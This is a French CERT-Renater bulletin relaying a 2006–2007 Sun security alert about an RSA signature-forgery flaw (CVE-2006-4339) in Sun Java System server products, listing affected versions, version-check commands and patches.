===================================================================== CERT-Renater Note d'Information No. 2007/VULN129 _____________________________________________________________________ DATE : 20/03/2007 HARDWARE PLATFORM(S) : / OPERATING SYSTEM(S) : Systems running Sun Java System Application Server, Sun Java System Proxy Server, Sun Java System Web Server. ====================================================================== Sun(sm) Alert Notification * Sun Alert ID: 102696 * Synopsis: A Security Vulnerability in RSA Signature Verification Affects Sun Java System Application Server, Proxy Server and Web Server * Category: Security * Product: Sun Java System Application Server Standard Edition 7 2004Q2, Sun Java System Application Server Platform Edition 8.1 2005Q1, Sun Java System Web Proxy Server 4.0, Sun Java System Web Server 6.1, Sun Java System Application Server Enterprise Edition 7 2004Q2, Sun Java System Application Server Enterprise Edition 8.1 2005Q1, Sun ONE Web Server 6.0, Sun Java System Web Proxy Server 3.6 * BugIDs: 6472033, 6473494 * Avoidance: Patch * State: Workaround * Date Released: 03-Nov-2006 * Date Closed: * Date Modified: 08-Nov-2006, 21-Nov-2006, 10-Mar-2007 1. Impact Sun Java System Application Server, Sun Java System Proxy Server and Sun Java System Web Server are vulnerable to an RSA(1) Signature Verification vulnerability which may allow remote unprivileged users to construct certificates with forged signatures that go undetected and are accepted as valid. This issue is also described in the following documents: CERT VU#845620 at http://www.kb.cert.org/vuls/id/845620 CVE-2006-4339 at http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4339 2. Contributing Factors This issue can occur in the following releases: SPARC Platform * Sun ONE Application Server 7 * Sun Java System Application Server 7 2004Q2 * Sun Java System Application Server Enterprise Edition 8.1 2005 Q1 without (file-based) patch 119169-12 or (SVR4) patch 119166-20 * Sun Java System Application Server Platform Edition 8.1 2005 Q1 without (file-based) patch 119173-12 or (SVR4) patch 119166-20 * Sun ONE Web Proxy Server 3.6 * Sun Java System Proxy Server 4.0 * Sun Java System Web Server 6.0 without Service Pack 11 * Sun Java System Web Server 6.1 without Service Pack 7 x86 Platform * Sun ONE Application Server 7 * Sun Java System Application Server 7 2004Q2 * Sun Java System Application Server Enterprise Edition 8.1 2005 Q1 2005 Q1 without (file-based) patch 119170-12 or (SVR4) patch 119167-20 * Sun Java System Application Server Platform Edition 8.1 2005 Q1 without (file-based) patch 119174-12 or (SVR4) patch 119167-20 * Sun Java System Proxy Server 4.0 * Sun Java System Web Server 6.1 without Service Pack 7 Linux Platform * Sun ONE Application Server 7 * Sun Java System Application Server 7 2004Q2 * Sun Java System Application Server Enterprise Edition 8.1 2005 Q1 without (file-based) patch 119171-12 or RHEL2.1/RHEL3.0 (Pkg_patch) 119168-20 * Sun Java System Application Server Platform Edition 8.1 2005 Q1 without (file-based) patch 119175-12 or RHEL2.1/RHEL3.0 (Pkg_patch) 119168-20 * Sun Java System Proxy Server 4.0 * Sun Java System Web Server 6.0 without Service Pack 11 * Sun Java System Web Server 6.1 without Service Pack 7 AIX Platform * Sun ONE Web Proxy Server 3.6 * Sun Java System Web Server 6.0 without Service Pack 11 * Sun Java System Web Server 6.1 without Service Pack 7 HP-UX Platform * Sun ONE Web Proxy Server 3.6 * Sun Java System Application Server Enterprise Edition 8.1 2005 * Sun Java System Web Server 6.0 without Service Pack 11 * Sun Java System Web Server 6.1 without Service Pack 7 Windows Platform * Sun ONE Application Server 7 * Sun Java System Application Server 7 2004Q2 * Sun Java System Application Server Enterprise Edition 8.1 2005 Q1 without (file-based) patch 119172-12 * Sun Java System Application Server Platform Edition 8.1 2005 Q1 without (file-based) patch 119176-12 * Sun ONE Web Proxy Server 3.6 * Sun Java System Proxy Server 4.0 * Sun Java System Web Server 6.0 without Service Pack 11 * Sun Java System Web Server 6.1 without Service Pack 7 To determine the version of Sun Java System Application Server on a system, the following command can be run: $ /bin/asadmin version --verbose Sun Java System Application Server 7 2004Q2UR3 (build A051525-273129) (Where is the installation directory of the Application Server). To determine the version of Sun Java System Web Server on a system, the following command can be run: $ /https-/start -version (Where is top installation directory of Web Server and should be the actual host name on which the Web Server is installed). To determine the version of Sun Java System Proxy Server on a system, the following command can be run: $ /bin/ns-proxy -v Sun ONE Web Proxy Server 3.6-SP9 B2006.191.1801 SP9 (Where is the installation directory of the Proxy Server). 3. Symptoms There are no predictable symptoms that would indicate the described issue has occurred. 4. Relief/Workaround There is no workaround for this issue. Please see the Resolution section below. 5. Resolution This issue is addressed in the following releases: SPARC Platform * Sun Java System Application Server Enterprise Edition 8.1 2005 Q1 with (file-based) patch 119169-12 or later or (SVR4) patch 119166-20 or later * Sun Java System Application Server Platform Edition 8.1 2005 Q1 with (file-based) patch 119173-12 or later or (SVR4) patch 119166-20 or later * Sun Java System Web Server 6.0 with Service Pack 11 or later * Sun Java System Web Server 6.1 with Service Pack 7 or later x86 Platform * Sun Java System Application Server Enterprise Edition 8.1 2005 Q1 with (file-based) patch 119170-12 or later or (SVR4) patch 119167-20 or later * Sun Java System Application Server Platform Edition 8.1 2005 Q1 with (file-based) patch 119174-12 later or (SVR4) patch 119167-20 or later * Sun Java System Web Server 6.1 with Service Pack 7 or later Linux Platform * Sun Java System Application Server Enterprise Edition 8.1 2005 Q1 with (file-based) patch 119171-12 or later or RHEL2.1/RHEL3.0 (Pkg_patch) 119168-20 or later * Sun Java System Application Server Platform Edition 8.1 2005 Q1 with (file-based) patch 119175-12 or later or RHEL2.1/RHEL3.0 (Pkg_patch) 119168-20 or later * Sun Java System Web Server 6.0 with Service Pack 11 or later * Sun Java System Web Server 6.1 with Service Pack 7 or later AIX Platform * Sun Java System Web Server 6.0 with Service Pack 11 or later * Sun Java System Web Server 6.1 with Service Pack 7 or later HP-UX Platform * Sun Java System Web Server 6.0 with Service Pack 11 or later * Sun Java System Web Server 6.1 with Service Pack 7 or later Windows Platform * Sun Java System Application Server Enterprise Edition 8.1 2005 Q1 with (file-based) patch 119172-12 or later * Sun Java System Application Server Platform Edition 8.1 2005 Q1 with (file-based) patch 119176-12 or later * Sun Java System Web Server 6.0 with Service Pack 11 or later * Sun Java System Web Server 6.1 with Service Pack 7 or later Sun Java System Web Server 6.0 Service Pack 11 is available at: http://www.sun.com/download/products.xml?id=459db7b2 Sun Java System Web Server 6.1 Service Pack 7 is available at: http://www.sun.com/download/products.xml?id=45c90ca9 A final resolution is pending completion. Change History 08-Nov-2006: * Updated Contributing Factors section 21-Nov-2006: * Updated Contributing Factors and Resolution sections 10-Mar-2007: * Updated Contributing Factors and Resolution sections This Sun Alert notification is being provided to you on an "AS IS" basis. This Sun Alert notification may contain information provided by third parties. The issues described in this Sun Alert notification may or may not impact your system(s). Sun makes no representations, warranties, or guarantees as to the information contained herein. ANY AND ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT, ARE HEREBY DISCLAIMED. BY ACCESSING THIS DOCUMENT YOU ACKNOWLEDGE THAT SUN SHALL IN NO EVENT BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, PUNITIVE, OR CONSEQUENTIAL DAMAGES THAT ARISE OUT OF YOUR USE OR FAILURE TO USE THE INFORMATION CONTAINED HEREIN. This Sun Alert notification contains Sun proprietary and confidential information. It is being provided to you pursuant to the provisions of your agreement to purchase services from Sun, or, if you do not have such an agreement, the Sun.com Terms of Use. This Sun Alert notification may only be used for the purposes contemplated by these agreements. Copyright 2000-2006 Sun Microsystems, Inc., 4150 Network Circle, Santa Clara, CA 95054 U.S.A. All rights reserved ====================================================================== ========================================================= Les serveurs de référence du CERT-Renater http://www.urec.fr/securite http://www.cru.fr/securite http://www.renater.fr ========================================================= + CERT-RENATER | tel : 01-53-94-20-44 + + 151 bd de l'Hopital | fax : 01-53-94-20-41 + + 75013 Paris | email: certsvp@renater.fr + =========================================================